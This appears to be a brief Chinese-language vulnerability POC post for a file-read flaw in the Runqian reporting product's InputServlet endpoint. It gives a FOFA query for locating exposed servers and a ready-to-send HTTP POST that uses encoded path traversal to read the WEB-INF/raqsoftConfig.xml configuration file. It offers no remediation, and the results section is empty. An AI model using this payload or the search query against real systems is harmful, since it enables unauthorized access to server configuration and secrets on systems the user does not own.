漏洞描述：

润乾报表是一款功能全面且性能卓越的报表产品。它专注于企业级BI产品的研发和推广，通过提供丰富的报表功能和高效的开发工具，帮助用户提升图表的开发效率，节省成本。

润乾报表InputServlet13接口存在文件读取漏洞，攻击者可利用漏洞读取服务器的敏感信息。

搜索语法:

Fofa-Query: body="润乾报表"

漏洞详情：

1.润乾报表产品。

2.漏洞POC：

POST /InputServlet?action=13 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 79
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

file=%2F%5C..%5C%5C..%5C%5CWEB-INF%5C%5CraqsoftConfig.xml&upFileName=web.config

3.漏洞复现结果。